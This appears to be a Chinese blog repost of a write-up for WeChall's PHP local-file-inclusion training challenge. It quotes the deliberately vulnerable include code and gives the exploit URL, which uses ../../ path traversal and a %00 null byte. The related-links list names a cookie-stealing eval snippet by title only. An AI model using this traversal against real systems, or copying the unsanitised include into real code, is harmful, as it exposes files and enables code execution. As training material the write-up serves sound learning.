当前位置: 首页 > news >正文

[WeChall] Training: PHP LFI (Exploit, PHP,Tra..

news 来源:原创 2024/9/30 4:19:13

题目

[WeChall] Training: PHP LFI (Exploit, PHP, Training)

Your mission is to exploit this code, which has obviously an LFI vulnerability:

GeSHi`ed PHP code

$filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
include $filename;

There is a lot of important stuff in ../solution.php, so please include and execute this file for us.

Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums

分析

这是关于利用文件包含漏洞的题目。 目标是执行../solution.php文件。

题目的网址是:http://www.wechall.net/challenge/training/php/lfi/up/index.php

复制一下../solution.php的地址,
[WeChall] Training: PHP LFI (Exploit, PHP,Tra..
可以看到是http://www.wechall.net/challenge/training/php/lfi/solution.php

所以应该是../../ 而不是 ../, 因为从index.php跳转到solution.php需要经过两个父目录。

但是直接提交?file=../../solution.php会出错,提示找不到文件pages/../../solution.php.html

可以看到后面多了个.html,可以利用空字节%00来过滤掉后面的.html

解决

最终只要浏览器访问下面地址,即可解题成功:

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

相关文章:

  • Ubuntu18.04 用Tweaks 调整标题栏的点击行为
  • 解决 Ubuntu下 谷歌浏览器 不保存自动填充密码
  • 解决 have unmet dependencies: youdao-dict :
  • 解决VMware 小度wifi 驱动报错问题 Driver error
  • 对 eval(‘new Image().src=....ment.cookie) 的理解
  • 在 VMware 虚拟机中 安装 Windows7 精简版系统
  • 解决 Ubuntu cherry键盘 三键同时按切换大写的问题
  • Python3 解决1元钱一瓶汽水,喝完后两个空瓶换一瓶
  • Python3 找出1000以内的所有完数 简单解决方法
  • Python 补充calcSn()函数,求Sn=1-3+5-7+ 9-11
  • python3 题目:打印如下九九乘法表 需要限制格式
  • Python3 古典问题: 有一对兔子,从出生后第3个月
  • Python3 判断字符串是否是回文 用列表实现的方法
  • php和mysql web开发(英文第5版) PDF+完整源码
  • 将行列式 λ-1 2 0 2 λ-2 2 0 2 λ-3 化成 (λ+1)(λ-2)...
  • 《Java8实战》-第四章读书笔记(引入流Stream)
  • 【Amaple教程】5. 插件
  • 【笔记】你不知道的JS读书笔记——Promise
  • 【腾讯Bugly干货分享】从0到1打造直播 App
  • Javascripit类型转换比较那点事儿,双等号(==)
  • JavaScript对象详解
  • Js基础知识(一) - 变量
  • springMvc学习笔记(2)
  • VirtualBox 安装过程中出现 Running VMs found 错误的解决过程
  • Vue 2.3、2.4 知识点小结
  • 对象管理器(defineProperty)学习笔记
  • 构造函数(constructor)与原型链(prototype)关系
  • 三分钟教你同步 Visual Studio Code 设置
  • 协程
  • 延迟脚本的方式
  • 与 ConTeXt MkIV 官方文档的接驳
  • 智能网联汽车信息安全
  • 数据库巡检项
  • ​DB-Engines 11月数据库排名:PostgreSQL坐稳同期涨幅榜冠军宝座
  • ​LeetCode解法汇总2808. 使循环数组所有元素相等的最少秒数
  • ​创新驱动,边缘计算领袖:亚马逊云科技海外服务器服务再进化
  • ​猴子吃桃问题:每天都吃了前一天剩下的一半多一个。
  • ${factoryList }后面有空格不影响
  • (11)工业界推荐系统-小红书推荐场景及内部实践【粗排三塔模型】
  • (2)MFC+openGL单文档框架glFrame
  • (Redis使用系列) Springboot 使用redis实现接口Api限流 十
  • (附源码)springboot教学评价 毕业设计 641310
  • (三)elasticsearch 源码之启动流程分析
  • (一)模式识别——基于SVM的道路分割实验(附资源)
  • (已更新)关于Visual Studio 2019安装时VS installer无法下载文件,进度条为0,显示网络有问题的解决办法
  • (原创)可支持最大高度的NestedScrollView
  • (原創) 如何優化ThinkPad X61開機速度? (NB) (ThinkPad) (X61) (OS) (Windows)
  • (转)人的集合论——移山之道
  • **登录+JWT+异常处理+拦截器+ThreadLocal-开发思想与代码实现**
  • .net mvc 获取url中controller和action
  • .net分布式压力测试工具(Beetle.DT)
  • .net中的Queue和Stack
  • .so文件(linux系统)
  • @autowired注解作用_Spring Boot进阶教程——注解大全(建议收藏!)
  • @private @protected @public